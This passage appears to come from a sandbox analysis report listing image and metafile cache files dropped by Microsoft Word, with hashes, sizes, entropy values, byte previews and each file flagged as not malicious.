                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5D6A843C.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5ED34EDC.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.7410278194463613
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwtRTkUssVWlsW6A6lsZ:t/ve/yp058QYHahnzSNw3jccAOcAWztl
                                MD5:8934FD7E51E8605AE52A3C95280B7478
                                SHA1:60B5B4D322C82276922A240B0C2A0A9B10C6FCAB
                                SHA-256:F77DE63CDFADE25733E7EBC4DE9801CFAE42BE68F8A81C265E460402C3B27F91
                                SHA-512:A85FB7550DC948BF5395DFAC85E8EECB2142A5FA7A0AD8EDF739E18B383CA42734F84A3CDD94EC739C116B39AD0449A53678B068456EE5C49E385644D5F82F3A
                                Malicious:false
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g.."..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5FFA0504.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.754060096802613
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gw6r4UssVWlsW6A6lsWS:t/ve/yp058QYHahnzSNwUzccAOcAWztl
                                MD5:F67A90C1AB609F8C545DA089EFDAE1C8
                                SHA1:FAE71BF489B3D4792123D50BA42BB2E6BEE9228C
                                SHA-256:7A752C4DA921CCC5A971F487E48EF85B89CD2AEB569AE9F548719E9394052A2C
                                SHA-512:7FC0EB4433860E3C144B65D87CD718BA33FEE66EC9DFD8F5CE29BD7CE9CF15626BB7036FE4DFF2C34D25266ACB8D4FE9A4D3E08EFBA8211D7BE5F70099CF2DBB
                                Malicious:false
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g.."..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\647BB06.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.750806391079119
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwQYAhUssVWlsW6A6lsZ:t/ve/yp058QYHahnzSNwFccAOcAWztl
                                MD5:8436C2235EB1BBD97ADF43E95FD02CE8
                                SHA1:B16E2520D44DCE3E4DE3E97F9A651044957D7CB5
                                SHA-256:48F88EC1E3A36BC969EFBDD8E6A12D66EF8CFCF6B247708B018DE21DF2A6615F
                                SHA-512:1E3BE8B506ADB1108ACC72581C3C28EF5D548D274509683E257788D0B75EE756DB1F16DF43F3BE4A6E8F8C1E4235E42ABDF7FCCDDCB1C0B2DFAD7AA7CBF8DD70
                                Malicious:false
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g(."..j...I.u@..u..f,....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6A1F40C3.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.6931414190406318
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gw94d8SUssVWlsW6A6lsWS:MQe/yp058QYHahnzSNwDZccAOcAWztl
                                MD5:D9050D476C53C087C432424D18BEE35A
                                SHA1:A0CE2B75593A8930C8A2B6AAAE3A3234025F927E
                                SHA-256:3F9823F2D24C3FC12B7253EC6BBBA9C6D26B3BE8C559F7B92DFED8C30C0CEA79
                                SHA-512:3618280DCFFEC9C4F637FE9FF27DCC2A289E33C13CD8F5DCF3662E0D4968A6B100EDD91FA396FDD8154BC7BEAB5E66668C6DED9ACC9ED3F027F071B03CB6FBB4
                                Malicious:false
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..gh."..j...I.u@..uE.fM....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6D63D41.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7A041398.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8CE970BF.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.6794032226642415
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwXA7ChUssVWlsW6A6lsWS:MQe/yp058QYHahnzSNwjyccAOcAWztl
                                MD5:579D464CECAA3CD6692B15E2E425C20C
                                SHA1:2E1DBF780FA1685E67924989B6F9C9F8739C0F3A
                                SHA-256:B4EBF29AD33B0C328AFFA79132BB181DE0404686638343B8388CB6A6427D264A
                                SHA-512:6024D17541F41FF74525E6706B3B127E643EE9C67AC400F54F752C20A2F0CC69F016BDA2139A982EBD1C8AF4E0B874A3F7E7141EF53D19DE6E721391E240F3EF
                                Malicious:false
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g..!..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8E0F854A.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.742808333939052
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gw94d8SUssVWlsW6A6lA:t/ve/yp058QYHahnzSNwDZccAOcAWztl
                                MD5:4231CD6127B492249EF1FA93BCBA6BB8
                                SHA1:8E98AEB45AD3EDA39F097085A2BE3511F6E4428C
                                SHA-256:1389D62DCA5FFC19C8D28DB7028580016545EBB7C72714A08331A31F8CC6439E
                                SHA-512:5C4207E5D922AC957D7951AA35DA2327FDCF39BC63B2ADD97ACA74FE247D6CB9F0388F6BC59885A989C42E8F1B61A02A22910F2604B1469564DB54E7F2A57777
                                Malicious:false
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..gh."..j...I.u@..uE.fM....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9E9C51E.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.7344421409333846
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gw49xAhUssVWlsW6A6lA:t/ve/yp058QYHahnzSNwWzccAOcAWztl
                                MD5:0670F8886D8B2ADFABFFC5DEAE26E36F
                                SHA1:9FECF12969813BB0767101446976B305C834D1B4
                                SHA-256:E64F12A8BC6EA7B601A6B5036209A5CED8CF9EE555F54A0F106C99C4F80EA3D2
                                SHA-512:57979CE30BD054D38C19B06D9D4FAA01677CB0DDF3B1171EC28B5D9BE9F9E395F5FFD532D6974BF22F115A6DD25F94F9F4575127208FE8EA27CE0901E93C1E17
                                Malicious:false
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g(.!..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AAD425B2.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.749635318041551
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwY4LUssVWlsW6A6lsWS:t/ve/yp058QYHahnzSNwYhccAOcAWztl
                                MD5:A53FD310182B8DA14BE0E22A440105EA
                                SHA1:A91BCFB1E01922A2C2E3E106A1B50691D4CC4996
                                SHA-256:52A469268392E4252E6EF7F8D42BE5F6A02BE7C3383E5E71D94E0789591FF1DC
                                SHA-512:187A2417754006622DC018DA5347C6CDFB3DF46C987F4AE88741449AFFA7ED47572028228B47909669339C762CD4B75165AC8349466EB388902EFB7F137E6ECF
                                Malicious:false
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..gH."..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B0A2024E.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B5A2A92D.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.691335218454382
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwtRTkUssVWlsW6A6lsW6X:MQe/yp058QYHahnzSNw3jccAOcAWztl
                                MD5:3B32B9F267CF31F99CB4F7C57DEE9065
                                SHA1:32E3A5B652FD19BBB718E9BEE84A673CA4D95179
                                SHA-256:99C45945420336B5DC994F243AA59F8075DEF1B35EED3B05EA702FD08C81F40F
                                SHA-512:33AE50093DA2549C312F557A10F4929900662C43E84187754EEB1AF856D16EDF83CAD9718469844A4899428486E40FA07C83B279E3C2EDFCC1E0D892E0430D39
                                Malicious:false
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g.."..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBDB8EB9.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BD817825.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.7031495359234974
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwajk6SUssVWlsW6A6lsWS:MQe/yp058QYHahnzSNwBiccAOcAWztl
                                MD5:38166337CE725C22B495ECAC8091BFBE
                                SHA1:A8E7A6EED660D1405E3D773A8D7275E163E941FA
                                SHA-256:A440C62F0FA60F48B7D8E3DC3D9742BC2C3B1A854B68A017A6BE633BD403EDDD
                                SHA-512:BC0E7A3AA2717EBC5E2DB7AEDAB5123B5B664A3AA0970260343F97051053E566AF5405AF4ABF0251D0DE0596B6F7B54C2048378290ADE568AA06AAB378069CEC
                                Malicious:false
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..gH.!..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE0C0967.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BEC331F7.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C2CD1A2F.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CF532FF0.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CFBE4B7E.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D7507D7A.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D8A51236.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ms-windows metafont .wmf
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):2.7298859769213393
                                Encrypted:false
                                SSDEEP:6:t/OQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwXA7ChUssVWlsW6A6lA:t/ve/yp058QYHahnzSNwjyccAOcAWztl
                                MD5:89BA38D98963008D54593D74F35FE2FB
                                SHA1:3ADA8FD54496D3DEFC8ABF0126A34A7406887FE7
                                SHA-256:D620321C67564B14272806CDDC0760E0F7FA6800A6DA05F9DEBDEAD7CB4E4D82
                                SHA-512:14B1E45EB26E8E69C7D993C3A448003762F477FFF06DB3F2CEB15636ED8A65F66C7FC8E6B7047E220352C20D388F642C01C606310C79460E6CA027529302B329
                                Malicious:false
                                Preview: .............b.....sW............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g..!..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E22CD60B.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.7001629951906034
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwY4LUssVWlsW6A6lsW6A8:MQe/yp058QYHahnzSNwYhccAOcAWztl
                                MD5:B968160E32B2FBEBB3FF6C55F5B4885B
                                SHA1:31D9C3B53280631A1D80E155E358582A750198C6
                                SHA-256:7CF4AE188785F7C0E5E4A1D5BDAC0B52BC65D3AA46513022A9E35489765C19C9
                                SHA-512:C1D0DA5100CEBC9B238959D8C42E34B67280334D3A4037D7CA1213D3EB1E5094A476DBEB158BB3B8E3F7005D7DC6A6F2519E722515041DE5F61804E71A0BE6E7
                                Malicious:false
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..gH."..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E556F687.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.684192492742019
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gw49xAhUssVWlsW6A6lsWS:MQe/yp058QYHahnzSNwWzccAOcAWztl
                                MD5:23EE1904F10A3641361F163E000DFF66
                                SHA1:E7F0DBFC0CDF5F809EC8FFD4D05F4EA455027246
                                SHA-256:58D13515C530476E847D64718305B845B4110F87C88C7761BA9A053653499001
                                SHA-512:71C64DBABBC61D54F2BDFF0EF472CE7F3A00800F97BA010C8CDDEA2E89BB7C652CB1019DAEAA7485D100A7FF4BF27B2FACD908EB947FF42C623577A7A2839FAA
                                Malicious:false
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g(.!..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F10ED7E2.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F514F566.jpeg
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 1431x567, frames 3
                                Category:dropped
                                Size (bytes):91877
                                Entropy (8bit):7.730443134156947
                                Encrypted:false
